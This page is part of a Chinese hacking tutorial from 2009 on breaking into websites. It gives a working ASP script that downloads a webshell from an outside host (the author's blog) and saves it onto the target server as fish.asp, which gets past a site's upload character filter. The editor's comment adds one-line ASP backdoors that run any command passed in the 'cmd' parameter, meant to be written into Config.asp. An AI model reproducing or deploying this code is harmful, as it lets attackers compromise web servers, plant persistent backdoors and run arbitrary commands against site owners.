WEB开发网
开发学院网络安全黑客技术 几个用过的经典入侵技巧整理 阅读

几个用过的经典入侵技巧整理

 2009-06-15 16:54:51 来源:WEB开发网   
核心提示: 图片看不清楚?请点击这里查看原图(大图),本来以为换个大马就可以了,几个用过的经典入侵技巧整理(7),但是我换了N个马都是不行,我想可能是禁止提交了,写进 Config.asp里的就要是容错的一句话了,比如:<%if request("cmd")<>&

几个用过的经典入侵技巧整理

图片看不清楚?请点击这里查看原图(大图)。

本来以为换个大马就可以了,但是我换了N个马都是不行。我想可能是禁止提交了,但是随便提交几个字都是OK的,原来是因为它设置了限制提交字符,只要我们的大马里包含特殊字符就会被拒绝提交,不过我们还是有办法突破他的。

这个就好比我们上传EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中。比如VBS?嘿嘿 好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件,代码如下:

<%

Set xPost = CreateObject("Microsoft.XMLHTTP")

xPost.Open "GET",http://www.hack521.cn/fish.txt,False

xPost.Send()

Set sGet = CreateObject("ADODB.Stream")

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile Server.MapPath("fish.asp"),2

set sGet = nothing

set sPOST = nothing

%>

利用服务器的XML和数据流组件,从我的blog的fish.txt的内容下载到目标站点根目录并保存为fish.asp。fish.txt中的内容当然就是被拦截的内容了,也就是我们的大马。之后访问这个提交的ASP文件,会出现一片空白,然后我们再访问这个fish.asp文件,则想要上传的内容已经被保存成功!如图8。

图8

几个用过的经典入侵技巧整理

图片看不清楚?请点击这里查看原图(大图)。

怎么样?亲爱的读者?你学会了没有?是不是脑子里又多了一条新思路?这期我主要以三个实例来讲解一下一些大家都知道但是都不常用的方法。很多朋友问过我,为什么我写的文章里所用的方法家都知道,为什么就想不到呢?还是那句话,思路要清晰,渗透是一个细致活,不急不躁方能心平。我的ID是CNSST或者加我 QQ也可以:459014 ,下期见!

编辑点评:MSSQL是个强大的数据库,能灵活运用其提供给我们的扩展,就不是一般的高手了;关于配置文件写马,为了写马后还能让网站运行正常,写进 Config.asp里的就要是容错的一句话了,比如:<%if request("cmd")<>"" then execute request("cmd")%>或者<%on error resume next:execute request("cmd")%>等等;如果你能熟练掌握MS的一些组件运用,你也是个高手了。

上一页  2 3 4 5 6 7 

Tags:经典 入侵 技巧

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接